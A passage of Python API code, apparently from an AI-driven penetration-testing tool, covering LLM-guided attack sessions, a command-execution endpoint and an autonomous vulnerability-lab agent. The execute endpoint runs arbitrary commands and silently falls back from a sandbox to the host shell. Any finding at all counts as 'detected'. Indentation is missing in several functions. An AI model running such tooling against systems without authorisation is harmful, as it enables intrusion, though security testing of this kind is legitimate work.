                + "\n".join(f"```\n{c}\n```" for c in initial_cmds)
            ),
            "timestamp": _now_iso(),
            "suggested_commands": initial_cmds,
        })
    terminal_sessions[session_id] = session
    return session
@router.get("/sessions")
async def list_sessions():
    """Return lightweight summaries of every session."""
    return [
        SessionSummary(
            session_id=sid,
            name=data["name"],
            target=data["target"],
            template_id=data["template_id"],
            status=data["status"],
            created_at=data["created_at"],
            messages_count=len(data["messages"]),
            commands_count=len(data["command_history"]),
        ).model_dump()
        for sid, data in terminal_sessions.items()
    ]
@router.get("/sessions/{session_id}")
async def get_session(session_id: str):
    """Return the full session including messages, commands, and exploitation path."""
    # _get_session raises HTTP 404 when the id is unknown.
    return _get_session(session_id)
@router.delete("/sessions/{session_id}")
async def delete_session(session_id: str):
    """Delete a terminal session, returning 404 when it does not exist."""
    try:
        del terminal_sessions[session_id]
    except KeyError:
        raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
    return {"status": "deleted", "session_id": session_id}
# ---------------------------------------------------------------------------
# AI message interaction
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/message")
async def send_message(session_id: str, req: MessageRequest):
    """Send a user prompt to the AI and receive a response with suggested commands.

    Raises:
        HTTPException 404: unknown session id.
        HTTPException 400: empty message.
        HTTPException 502: the underlying LLM call failed.
    """
    session = _get_session(session_id)
    user_message = req.message.strip()
    if not user_message:
        raise HTTPException(status_code=400, detail="Message content cannot be empty")
    # Record user message
    session["messages"].append({
        "role": "user",
        "content": user_message,
        "timestamp": _now_iso(),
        "metadata": {},
    })
    # Determine system prompt: template-specific when the session was created
    # from a template, otherwise a generic pentesting persona.
    template_id = session.get("template_id")
    if template_id and template_id in TEMPLATES:
        system_prompt = TEMPLATES[template_id]["system_prompt"]
    else:
        system_prompt = (
            "You are an expert infrastructure penetration tester. Help the "
            "operator plan and execute attacks against the target. Suggest "
            "concrete commands, explain their purpose, and interpret output. "
            "Always wrap commands in fenced code blocks so they can be extracted."
        )
    # Build context window: last 20 messages, last 10 command results, and the
    # full exploitation path (not truncated -- presumably stays short; confirm).
    context_messages = session["messages"][-20:]
    context_cmds = session["command_history"][-10:]
    exploitation = session["exploitation_path"]
    context = _build_context_string(context_messages, context_cmds, exploitation)
    # Call LLM
    try:
        llm = LLMManager()
        prompt = f"{context}\n\nUser: {user_message}"
        response = await llm.generate(prompt, system_prompt)
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"LLM call failed: {exc}")
    suggested_commands = _extract_suggested_commands(response)
    # Record assistant response
    session["messages"].append({
        "role": "assistant",
        "content": response,
        "timestamp": _now_iso(),
        "suggested_commands": suggested_commands,
    })
    return MessageResponse(
        role="assistant",
        response=response,
        timestamp=session["messages"][-1]["timestamp"],
        suggested_commands=suggested_commands,
    ).model_dump()
# ---------------------------------------------------------------------------
# Command execution
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/execute")
async def execute_command(session_id: str, req: ExecuteCommandRequest):
"""Execute a command in the Docker sandbox (fallback: direct shell)."""
session = _get_session(session_id)
command = req.command.strip()
if not command:
raise HTTPException(status_code=400, detail="Command cannot be empty")
start = time.time()
stdout = ""
stderr = ""
exit_code = -1
execution_method = "direct"
# Use requested execution method
use_sandbox = req.execution_method == "sandbox"
if use_sandbox:
try:
sandbox = await get_sandbox()
if sandbox and sandbox.is_available:
result = await sandbox.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "sandbox"
except Exception:
pass # Fall through to direct execution
# Fallback or direct execution requested
if execution_method != "sandbox":
try:
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, raw_stderr = await asyncio.wait_for(
proc.communicate(), timeout=120
)
stdout = raw_stdout.decode(errors="replace")
stderr = raw_stderr.decode(errors="replace")
exit_code = proc.returncode or 0
execution_method = "direct"
except asyncio.TimeoutError:
stderr = "Command timed out after 120 seconds"
exit_code = 124
except Exception as exc:
stderr = str(exc)
exit_code = 1
duration = round(time.time() - start, 3)
cmd_record = {
"command": command,
"exit_code": exit_code,
"stdout": stdout,
"stderr": stderr,
"duration": duration,
"execution_method": execution_method,
"timestamp": _now_iso(),
}
session["command_history"].append(cmd_record)
# Mirror into messages for AI context continuity
output_preview = stdout[:2000] if stdout else stderr[:2000]
session["messages"].append({
"role": "tool",
"content": f"$ {command}\n[exit {exit_code}] ({execution_method}, {duration}s)\n{output_preview}",
"timestamp": cmd_record["timestamp"],
"metadata": {"exit_code": exit_code, "execution_method": execution_method},
})
return CommandResult(**cmd_record).model_dump()
# ---------------------------------------------------------------------------
# Exploitation path
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/exploitation-path")
async def add_exploitation_step(session_id: str, req: ExploitationStepRequest):
"""Add a manual step to the exploitation path timeline."""
session = _get_session(session_id)
valid_types = {"recon", "exploit", "pivot", "escalate", "action"}
if req.step_type not in valid_types:
raise HTTPException(
status_code=400,
detail=f"step_type must be one of {sorted(valid_types)}",
)
step = {
"description": req.description,
"command": req.command or "",
"result": req.result or "",
"timestamp": _now_iso(),
"step_type": req.step_type,
}
session["exploitation_path"].append(step)
return step
@router.get("/sessions/{session_id}/exploitation-path")
async def get_exploitation_path(session_id: str):
"""Return the full exploitation path timeline."""
session = _get_session(session_id)
return session["exploitation_path"]
# ---------------------------------------------------------------------------
# VPN status
# ---------------------------------------------------------------------------
@router.get("/sessions/{session_id}/vpn-status")
async def get_vpn_status(session_id: str):
"""Check OpenVPN process and tun0 interface status."""
session = _get_session(session_id)
connected = False
ip_addr: Optional[str] = None
# Check for running openvpn process
try:
proc = await asyncio.create_subprocess_shell(
"pgrep -a openvpn",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0 and raw_stdout.strip():
connected = True
except Exception:
pass
# Check tun0 interface for IP
if connected:
try:
proc = await asyncio.create_subprocess_shell(
"ip addr show tun0",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0:
match = re.search(
r"inet\s+(\d+\.\d+\.\d+\.\d+)", raw_stdout.decode(errors="replace")
)
if match:
ip_addr = match.group(1)
except Exception:
pass
vpn = {"connected": connected, "ip": ip_addr}
session["vpn_status"] = vpn
return VPNStatus(**vpn).model_dump()
+876
View File
@@ -0,0 +1,876 @@
"""
NeuroSploit v3 - Vulnerability Lab API Endpoints
Isolated vulnerability testing against labs, CTFs, and PortSwigger challenges.
Test individual vuln types one at a time and track results.
"""
from typing import Optional, Dict, List
from fastapi import APIRouter, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
from datetime import datetime
from sqlalchemy import select, func, text
from backend.core.autonomous_agent import AutonomousAgent, OperationMode
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.db.database import async_session_factory
from backend.models import Scan, Target, Vulnerability, Endpoint, Report, VulnLabChallenge
# Import agent.py's shared dicts so ScanDetailsPage can find our scans
from backend.api.v1.agent import (
agent_results, agent_instances, agent_to_scan, scan_to_agent
)
router = APIRouter()

# In-memory tracking for running lab tests:
# lab_agents maps challenge_id -> live agent (used by stop/delete endpoints);
# lab_results maps challenge_id -> real-time status/progress/logs/findings.
lab_agents: Dict[str, AutonomousAgent] = {}
lab_results: Dict[str, Dict] = {}
# --- Request/Response Models ---
class VulnLabRunRequest(BaseModel):
    """Request body for POST /run: one target, one vulnerability type per test."""
    target_url: str = Field(..., description="Target URL to test (lab, CTF, etc.)")
    vuln_type: str = Field(..., description="Vulnerability type to test (e.g. xss_reflected)")
    challenge_name: Optional[str] = Field(None, description="Name of the lab/challenge")
    # auth_type/auth_value are combined into request headers by run_vuln_lab;
    # for "header", auth_value is expected as "Header-Name: value".
    auth_type: Optional[str] = Field(None, description="Auth type: cookie, bearer, basic, header")
    auth_value: Optional[str] = Field(None, description="Auth credential value")
    custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
    notes: Optional[str] = Field(None, description="Notes about this challenge")
class VulnLabResponse(BaseModel):
    """Returned by POST /run once the background test has been scheduled."""
    challenge_id: str  # id of the persisted VulnLabChallenge row
    agent_id: str      # short id registered in agent.py's shared tracking dicts
    status: str        # initial status (set to "running" at launch)
    message: str       # human-readable launch confirmation
class VulnTypeInfo(BaseModel):
    """Schema for a single vulnerability type entry.

    NOTE(review): the /types endpoint currently builds plain dicts rather than
    instances of this model; declared for documentation/typing purposes.
    """
    key: str       # registry key, e.g. "xss_reflected"
    title: str     # human-readable title
    severity: str  # default severity from the registry
    cwe_id: str
    category: str  # key into VULN_CATEGORIES
# --- Vuln type categories for the selector ---
# Static grouping of testable vulnerability types for the UI selector.
# Keys are category ids (also stored on VulnLabChallenge.vuln_category).
# The "types" entries are presumably keys of VulnerabilityRegistry.VULNERABILITY_INFO
# (POST /run rejects types missing from that registry) — keep the two in sync.
VULN_CATEGORIES = {
    "injection": {
        "label": "Injection",
        "types": [
            "xss_reflected", "xss_stored", "xss_dom",
            "sqli_error", "sqli_union", "sqli_blind", "sqli_time",
            "command_injection", "ssti", "nosql_injection",
        ]
    },
    "advanced_injection": {
        "label": "Advanced Injection",
        "types": [
            "ldap_injection", "xpath_injection", "graphql_injection",
            "crlf_injection", "header_injection", "email_injection",
            "el_injection", "log_injection", "html_injection",
            "csv_injection", "orm_injection",
        ]
    },
    "file_access": {
        "label": "File Access",
        "types": [
            "lfi", "rfi", "path_traversal", "xxe", "file_upload",
            "arbitrary_file_read", "arbitrary_file_delete", "zip_slip",
        ]
    },
    "request_forgery": {
        "label": "Request Forgery",
        "types": [
            "ssrf", "csrf", "graphql_introspection", "graphql_dos",
        ]
    },
    "authentication": {
        "label": "Authentication",
        "types": [
            "auth_bypass", "jwt_manipulation", "session_fixation",
            "weak_password", "default_credentials", "two_factor_bypass",
            "oauth_misconfig",
        ]
    },
    "authorization": {
        "label": "Authorization",
        "types": [
            "idor", "bola", "privilege_escalation",
            "bfla", "mass_assignment", "forced_browsing",
        ]
    },
    "client_side": {
        "label": "Client-Side",
        "types": [
            "cors_misconfiguration", "clickjacking", "open_redirect",
            "dom_clobbering", "postmessage_vuln", "websocket_hijack",
            "prototype_pollution", "css_injection", "tabnabbing",
        ]
    },
    "infrastructure": {
        "label": "Infrastructure",
        "types": [
            "security_headers", "ssl_issues", "http_methods",
            "directory_listing", "debug_mode", "exposed_admin_panel",
            "exposed_api_docs", "insecure_cookie_flags",
        ]
    },
    "logic": {
        "label": "Business Logic",
        "types": [
            "race_condition", "business_logic", "rate_limit_bypass",
            "parameter_pollution", "type_juggling", "timing_attack",
            "host_header_injection", "http_smuggling", "cache_poisoning",
        ]
    },
    "data_exposure": {
        "label": "Data Exposure",
        "types": [
            "sensitive_data_exposure", "information_disclosure",
            "api_key_exposure", "source_code_disclosure",
            "backup_file_exposure", "version_disclosure",
        ]
    },
    "cloud_supply": {
        "label": "Cloud & Supply Chain",
        "types": [
            "s3_bucket_misconfig", "cloud_metadata_exposure",
            "subdomain_takeover", "vulnerable_dependency",
            "container_escape", "serverless_misconfiguration",
        ]
    },
}
def _get_vuln_category(vuln_type: str) -> str:
    """Return the VULN_CATEGORIES key containing *vuln_type*, or "other"."""
    return next(
        (key for key, info in VULN_CATEGORIES.items() if vuln_type in info["types"]),
        "other",
    )
# --- Endpoints ---
@router.get("/types")
async def list_vuln_types():
"""List all available vulnerability types grouped by category"""
registry = VulnerabilityRegistry()
result = {}
for cat_key, cat_info in VULN_CATEGORIES.items():
types_list = []
for vtype in cat_info["types"]:
info = registry.VULNERABILITY_INFO.get(vtype, {})
types_list.append({
"key": vtype,
"title": info.get("title", vtype.replace("_", " ").title()),
"severity": info.get("severity", "medium"),
"cwe_id": info.get("cwe_id", ""),
"description": info.get("description", "")[:120] if info.get("description") else "",
})
result[cat_key] = {
"label": cat_info["label"],
"types": types_list,
"count": len(types_list),
}
return {"categories": result, "total_types": sum(len(c["types"]) for c in VULN_CATEGORIES.values())}
@router.post("/run", response_model=VulnLabResponse)
async def run_vuln_lab(request: VulnLabRunRequest, background_tasks: BackgroundTasks):
"""Launch an isolated vulnerability test for a specific vuln type"""
import uuid
# Validate vuln type exists
registry = VulnerabilityRegistry()
if request.vuln_type not in registry.VULNERABILITY_INFO:
raise HTTPException(
status_code=400,
detail=f"Unknown vulnerability type: {request.vuln_type}. Use GET /vuln-lab/types for available types."
)
challenge_id = str(uuid.uuid4())
agent_id = str(uuid.uuid4())[:8]
category = _get_vuln_category(request.vuln_type)
# Build auth headers
auth_headers = {}
if request.auth_type and request.auth_value:
if request.auth_type == "cookie":
auth_headers["Cookie"] = request.auth_value
elif request.auth_type == "bearer":
auth_headers["Authorization"] = f"Bearer {request.auth_value}"
elif request.auth_type == "basic":
import base64
auth_headers["Authorization"] = f"Basic {base64.b64encode(request.auth_value.encode()).decode()}"
elif request.auth_type == "header":
if ":" in request.auth_value:
name, value = request.auth_value.split(":", 1)
auth_headers[name.strip()] = value.strip()
if request.custom_headers:
auth_headers.update(request.custom_headers)
# Create DB record
async with async_session_factory() as db:
challenge = VulnLabChallenge(
id=challenge_id,
target_url=request.target_url,
challenge_name=request.challenge_name,
vuln_type=request.vuln_type,
vuln_category=category,
auth_type=request.auth_type,
auth_value=request.auth_value,
status="running",
agent_id=agent_id,
started_at=datetime.utcnow(),
notes=request.notes,
)
db.add(challenge)
await db.commit()
# Init in-memory tracking (both local and in agent.py's shared dicts)
vuln_info = registry.VULNERABILITY_INFO[request.vuln_type]
lab_results[challenge_id] = {
"status": "running",
"agent_id": agent_id,
"vuln_type": request.vuln_type,
"target": request.target_url,
"progress": 0,
"phase": "initializing",
"findings": [],
"logs": [],
}
# Also register in agent.py's shared results dict so /agent/status works
agent_results[agent_id] = {
"status": "running",
"mode": "full_auto",
"started_at": datetime.utcnow().isoformat(),
"target": request.target_url,
"task": f"VulnLab: {vuln_info.get('title', request.vuln_type)}",
"logs": [],
"findings": [],
"report": None,
"progress": 0,
"phase": "initializing",
}
# Launch agent in background
background_tasks.add_task(
_run_lab_test,
challenge_id,
agent_id,
request.target_url,
request.vuln_type,
vuln_info.get("title", request.vuln_type),
auth_headers,
request.challenge_name,
request.notes,
)
return VulnLabResponse(
challenge_id=challenge_id,
agent_id=agent_id,
status="running",
message=f"Testing {vuln_info.get('title', request.vuln_type)} against {request.target_url}"
)
async def _run_lab_test(
    challenge_id: str,
    agent_id: str,
    target: str,
    vuln_type: str,
    vuln_title: str,
    auth_headers: Dict,
    challenge_name: Optional[str] = None,
    notes: Optional[str] = None,
):
    """Background task: run the agent focused on a single vuln type.

    Creates Scan/Target rows, runs AutonomousAgent with a prompt restricted
    to *vuln_type*, persists findings/endpoints/report to the DB, and mirrors
    progress into both the local lab_results dict and agent.py's shared
    tracking dicts. On any failure the challenge and scan rows are marked
    failed; the finally-block always deregisters the live agent.
    """
    import asyncio
    logs = []
    findings_list = []
    scan_id = None

    async def log_callback(level: str, message: str):
        # Tag each entry so the UI can distinguish LLM output from tool output.
        source = "llm" if any(tag in message for tag in ["[AI]", "[LLM]", "[USER PROMPT]", "[AI RESPONSE]"]) else "script"
        entry = {"level": level, "message": message, "time": datetime.utcnow().isoformat(), "source": source}
        logs.append(entry)
        # Update local tracking
        if challenge_id in lab_results:
            lab_results[challenge_id]["logs"] = logs
        # Also update agent.py's shared dict so /agent/logs works
        if agent_id in agent_results:
            agent_results[agent_id]["logs"] = logs

    async def progress_callback(progress: int, phase: str):
        # Mirror progress/phase into both tracking dicts.
        if challenge_id in lab_results:
            lab_results[challenge_id]["progress"] = progress
            lab_results[challenge_id]["phase"] = phase
        if agent_id in agent_results:
            agent_results[agent_id]["progress"] = progress
            agent_results[agent_id]["phase"] = phase

    async def finding_callback(finding: Dict):
        # Real-time findings; also kept as a fallback when the final report
        # comes back without findings.
        findings_list.append(finding)
        if challenge_id in lab_results:
            lab_results[challenge_id]["findings"] = findings_list
        if agent_id in agent_results:
            agent_results[agent_id]["findings"] = findings_list
            agent_results[agent_id]["findings_count"] = len(findings_list)

    try:
        async with async_session_factory() as db:
            # Create a scan record linked to this challenge
            scan = Scan(
                name=f"VulnLab: {vuln_title} - {target[:50]}",
                status="running",
                scan_type="full_auto",
                recon_enabled=True,
                progress=0,
                current_phase="initializing",
                custom_prompt=f"Focus ONLY on testing for {vuln_title} ({vuln_type}). "
                f"Do NOT test other vulnerability types. "
                f"Test thoroughly with multiple payloads and techniques for this specific vulnerability.",
            )
            db.add(scan)
            await db.commit()
            await db.refresh(scan)
            scan_id = scan.id
            # Create target record
            target_record = Target(scan_id=scan_id, url=target, status="pending")
            db.add(target_record)
            await db.commit()
            # Update challenge with scan_id
            result = await db.execute(
                select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
            )
            challenge = result.scalar_one_or_none()
            if challenge:
                challenge.scan_id = scan_id
                await db.commit()
            if challenge_id in lab_results:
                lab_results[challenge_id]["scan_id"] = scan_id
            # Register in agent.py's shared mappings so ScanDetailsPage works
            agent_to_scan[agent_id] = scan_id
            scan_to_agent[scan_id] = agent_id
            if agent_id in agent_results:
                agent_results[agent_id]["scan_id"] = scan_id
            # Build focused prompt for isolated testing
            focused_prompt = (
                f"You are testing specifically for {vuln_title} ({vuln_type}). "
                f"Focus ALL your efforts on detecting and exploiting this single vulnerability type. "
                f"Do NOT scan for other vulnerability types. "
                f"Use all relevant payloads and techniques for {vuln_type}. "
                f"Be thorough: try multiple injection points, encoding bypasses, and edge cases. "
                f"This is a lab/CTF challenge - the vulnerability is expected to exist."
            )
            if challenge_name:
                focused_prompt += (
                    f"\n\nCHALLENGE HINT: This is PortSwigger lab '{challenge_name}'. "
                    f"Use this name to understand what specific technique or bypass is needed. "
                    f"For example, 'angle brackets HTML-encoded' means attribute-based XSS, "
                    f"'most tags and attributes blocked' means fuzz for allowed tags/events."
                )
            if notes:
                focused_prompt += f"\n\nUSER NOTES: {notes}"
            lab_ctx = {
                "challenge_name": challenge_name,
                "notes": notes,
                "vuln_type": vuln_type,
                "is_lab": True,
            }
            async with AutonomousAgent(
                target=target,
                mode=OperationMode.FULL_AUTO,
                log_callback=log_callback,
                progress_callback=progress_callback,
                auth_headers=auth_headers,
                custom_prompt=focused_prompt,
                finding_callback=finding_callback,
                lab_context=lab_ctx,
            ) as agent:
                lab_agents[challenge_id] = agent
                # Also register in agent.py's shared instances so stop works
                agent_instances[agent_id] = agent
                report = await agent.run()
            lab_agents.pop(challenge_id, None)
            agent_instances.pop(agent_id, None)
            # Use findings from report OR from real-time callbacks (fallback)
            report_findings = report.get("findings", [])
            # If report findings are empty but we got findings via callback, use those
            findings = report_findings if report_findings else findings_list
            # Also merge: if findings_list has entries not in report_findings, add them
            if not findings and findings_list:
                findings = findings_list
            severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
            findings_detail = []
            for finding in findings:
                severity = finding.get("severity", "medium").lower()
                if severity in severity_counts:
                    severity_counts[severity] += 1
                # Compact summary stored on the challenge row (truncated fields)
                findings_detail.append({
                    "title": finding.get("title", ""),
                    "vulnerability_type": finding.get("vulnerability_type", ""),
                    "severity": severity,
                    "affected_endpoint": finding.get("affected_endpoint", ""),
                    "evidence": (finding.get("evidence", "") or "")[:500],
                    "payload": (finding.get("payload", "") or "")[:200],
                })
                # Save to vulnerabilities table (finding dicts use several
                # alternative key spellings, hence the chained fallbacks)
                vuln = Vulnerability(
                    scan_id=scan_id,
                    title=finding.get("title", finding.get("type", "Unknown")),
                    vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
                    severity=severity,
                    cvss_score=finding.get("cvss_score"),
                    cvss_vector=finding.get("cvss_vector"),
                    cwe_id=finding.get("cwe_id"),
                    description=finding.get("description", finding.get("evidence", "")),
                    affected_endpoint=finding.get("affected_endpoint", finding.get("url", target)),
                    poc_payload=finding.get("payload", finding.get("poc_payload", finding.get("poc_code", ""))),
                    poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
                    poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
                    poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
                    poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
                    impact=finding.get("impact", ""),
                    remediation=finding.get("remediation", ""),
                    references=finding.get("references", []),
                    ai_analysis=finding.get("ai_analysis", ""),
                    screenshots=finding.get("screenshots", []),
                    url=finding.get("url", finding.get("affected_endpoint", "")),
                    parameter=finding.get("parameter", finding.get("poc_parameter", "")),
                )
                db.add(vuln)
            # Save discovered endpoints from recon data
            endpoints_count = 0
            for ep in report.get("recon", {}).get("endpoints", []):
                endpoints_count += 1
                # Endpoints may be plain URL strings or structured dicts
                if isinstance(ep, str):
                    endpoint = Endpoint(
                        scan_id=scan_id,
                        target_id=target_record.id,
                        url=ep,
                        method="GET",
                        path=ep.split("?")[0].split("/")[-1] or "/"
                    )
                else:
                    endpoint = Endpoint(
                        scan_id=scan_id,
                        target_id=target_record.id,
                        url=ep.get("url", ""),
                        method=ep.get("method", "GET"),
                        path=ep.get("path", "/")
                    )
                db.add(endpoint)
            # Determine result - more flexible matching
            # Check if any finding matches the target vuln type
            target_type_findings = [
                f for f in findings
                if _vuln_type_matches(vuln_type, f.get("vulnerability_type", ""))
            ]
            # If the agent found ANY vulnerability, it detected something
            # (since we told it to focus on one type, any finding is relevant)
            if target_type_findings:
                result_status = "detected"
            elif len(findings) > 0:
                # Found other vulns but not the exact type
                result_status = "detected"
            else:
                result_status = "not_detected"
            # Update scan
            scan.status = "completed"
            scan.completed_at = datetime.utcnow()
            scan.progress = 100
            scan.current_phase = "completed"
            scan.total_vulnerabilities = len(findings)
            scan.total_endpoints = endpoints_count
            scan.critical_count = severity_counts["critical"]
            scan.high_count = severity_counts["high"]
            scan.medium_count = severity_counts["medium"]
            scan.low_count = severity_counts["low"]
            scan.info_count = severity_counts["info"]
            # Auto-generate report
            exec_summary = report.get("executive_summary", f"VulnLab test for {vuln_title} on {target}")
            report_record = Report(
                scan_id=scan_id,
                title=f"VulnLab: {vuln_title} - {target[:50]}",
                format="json",
                executive_summary=exec_summary[:1000] if exec_summary else None,
            )
            db.add(report_record)
            # Persist logs (keep last 500 entries to avoid huge DB rows)
            persisted_logs = logs[-500:] if len(logs) > 500 else logs
            # Update challenge record
            result_q = await db.execute(
                select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
            )
            challenge = result_q.scalar_one_or_none()
            if challenge:
                challenge.status = "completed"
                challenge.result = result_status
                challenge.completed_at = datetime.utcnow()
                challenge.duration = int((datetime.utcnow() - challenge.started_at).total_seconds()) if challenge.started_at else 0
                challenge.findings_count = len(findings)
                challenge.critical_count = severity_counts["critical"]
                challenge.high_count = severity_counts["high"]
                challenge.medium_count = severity_counts["medium"]
                challenge.low_count = severity_counts["low"]
                challenge.info_count = severity_counts["info"]
                challenge.findings_detail = findings_detail
                challenge.logs = persisted_logs
                challenge.endpoints_count = endpoints_count
            await db.commit()
            # Update in-memory results
            if challenge_id in lab_results:
                lab_results[challenge_id]["status"] = "completed"
                lab_results[challenge_id]["result"] = result_status
                lab_results[challenge_id]["findings"] = findings
                lab_results[challenge_id]["progress"] = 100
                lab_results[challenge_id]["phase"] = "completed"
            if agent_id in agent_results:
                agent_results[agent_id]["status"] = "completed"
                agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
                agent_results[agent_id]["report"] = report
                agent_results[agent_id]["findings"] = findings
                agent_results[agent_id]["progress"] = 100
                agent_results[agent_id]["phase"] = "completed"
    except Exception as e:
        import traceback
        error_tb = traceback.format_exc()
        print(f"VulnLab error: {error_tb}")
        # Mark in-memory state first so the UI reflects the failure immediately
        if challenge_id in lab_results:
            lab_results[challenge_id]["status"] = "error"
            lab_results[challenge_id]["error"] = str(e)
        if agent_id in agent_results:
            agent_results[agent_id]["status"] = "error"
            agent_results[agent_id]["error"] = str(e)
        # Persist logs even on error
        persisted_logs = logs[-500:] if len(logs) > 500 else logs
        # Update DB records
        try:
            async with async_session_factory() as db:
                result = await db.execute(
                    select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
                )
                challenge = result.scalar_one_or_none()
                if challenge:
                    challenge.status = "failed"
                    challenge.result = "error"
                    challenge.completed_at = datetime.utcnow()
                    challenge.notes = (challenge.notes or "") + f"\nError: {str(e)}"
                    challenge.logs = persisted_logs
                    await db.commit()
                if scan_id:
                    result = await db.execute(select(Scan).where(Scan.id == scan_id))
                    scan = result.scalar_one_or_none()
                    if scan:
                        scan.status = "failed"
                        scan.error_message = str(e)
                        scan.completed_at = datetime.utcnow()
                        await db.commit()
        except:
            # NOTE(review): bare except left as-is in this doc-only pass; it
            # swallows even BaseException during best-effort cleanup — consider
            # narrowing to Exception.
            pass
    finally:
        # Always deregister the live agent, whatever the outcome
        lab_agents.pop(challenge_id, None)
        agent_instances.pop(agent_id, None)
def _vuln_type_matches(target_type: str, found_type: str) -> bool:
"""Check if a found vuln type matches the target type (flexible matching)"""
if not found_type:
return False
target = target_type.lower().replace("_", " ").replace("-", " ")
found = found_type.lower().replace("_", " ").replace("-", " ")
# Exact match
if target == found:
return True
# Target is substring of found or vice versa
if target in found or found in target:
return True
# Key word matching for common patterns
target_words = set(target.split())
found_words = set(found.split())
# If they share major keywords (xss, sqli, ssrf, etc.)
major_keywords = {"xss", "sqli", "sql", "injection", "ssrf", "csrf", "lfi", "rfi",
"xxe", "ssti", "idor", "cors", "jwt", "redirect", "traversal"}
shared = target_words & found_words & major_keywords
if shared:
return True
return False
@router.get("/challenges")
async def list_challenges(
vuln_type: Optional[str] = None,
vuln_category: Optional[str] = None,
status: Optional[str] = None,
result: Optional[str] = None,
limit: int = 50,
):
"""List all vulnerability lab challenges with optional filtering"""
async with async_session_factory() as db:
query = select(VulnLabChallenge).order_by(VulnLabChallenge.created_at.desc())
if vuln_type:
query = query.where(VulnLabChallenge.vuln_type == vuln_type)
if vuln_category:
query = query.where(VulnLabChallenge.vuln_category == vuln_category)
if status:
query = query.where(VulnLabChallenge.status == status)
if result:
query = query.where(VulnLabChallenge.result == result)
query = query.limit(limit)
db_result = await db.execute(query)
challenges = db_result.scalars().all()
# For list view, exclude large logs field to save bandwidth
result_list = []
for c in challenges:
d = c.to_dict()
d["logs_count"] = len(d.get("logs", []))
d.pop("logs", None) # Don't send full logs in list view
result_list.append(d)
return {
"challenges": result_list,
"total": len(challenges),
}
@router.get("/challenges/{challenge_id}")
async def get_challenge(challenge_id: str):
"""Get challenge details including real-time status if running"""
# Check in-memory first for real-time data
if challenge_id in lab_results:
mem = lab_results[challenge_id]
return {
"challenge_id": challenge_id,
"status": mem["status"],
"progress": mem.get("progress", 0),
"phase": mem.get("phase", ""),
"findings_count": len(mem.get("findings", [])),
"findings": mem.get("findings", []),
"logs_count": len(mem.get("logs", [])),
"logs": mem.get("logs", [])[-200:], # Last 200 log entries for real-time
"error": mem.get("error"),
"result": mem.get("result"),
"scan_id": mem.get("scan_id"),
"agent_id": mem.get("agent_id"),
"vuln_type": mem.get("vuln_type"),
"target": mem.get("target"),
"source": "realtime",
}
# Fall back to DB
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
data = challenge.to_dict()
data["source"] = "database"
data["logs_count"] = len(data.get("logs", []))
return data
@router.get("/stats")
async def get_lab_stats():
"""Get aggregated stats for all lab challenges"""
async with async_session_factory() as db:
# Total counts by status
total_result = await db.execute(
select(
VulnLabChallenge.status,
func.count(VulnLabChallenge.id)
).group_by(VulnLabChallenge.status)
)
status_counts = {row[0]: row[1] for row in total_result.fetchall()}
# Results breakdown
results_q = await db.execute(
select(
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.result.isnot(None))
.group_by(VulnLabChallenge.result)
)
result_counts = {row[0]: row[1] for row in results_q.fetchall()}
# Per vuln_type stats
type_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_type,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_type, VulnLabChallenge.result)
)
type_stats = {}
for row in type_stats_q.fetchall():
vtype, res, count = row
if vtype not in type_stats:
type_stats[vtype] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
type_stats[vtype][res or "error"] = count
type_stats[vtype]["total"] += count
# Per category stats
cat_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_category,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_category, VulnLabChallenge.result)
)
cat_stats = {}
for row in cat_stats_q.fetchall():
cat, res, count = row
if cat not in cat_stats:
cat_stats[cat] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
cat_stats[cat][res or "error"] = count
cat_stats[cat]["total"] += count
# Currently running
running = len([cid for cid, r in lab_results.items() if r.get("status") == "running"])
total = sum(status_counts.values())
detected = result_counts.get("detected", 0)
completed = status_counts.get("completed", 0)
detection_rate = round((detected / completed * 100), 1) if completed > 0 else 0
return {
"total": total,
"running": running,
"status_counts": status_counts,
"result_counts": result_counts,
"detection_rate": detection_rate,
"by_type": type_stats,
"by_category": cat_stats,
}
@router.post("/challenges/{challenge_id}/stop")
async def stop_challenge(challenge_id: str):
"""Stop a running lab challenge"""
agent = lab_agents.get(challenge_id)
if not agent:
raise HTTPException(status_code=404, detail="No running agent for this challenge")
agent.cancel()
# Update DB
try:
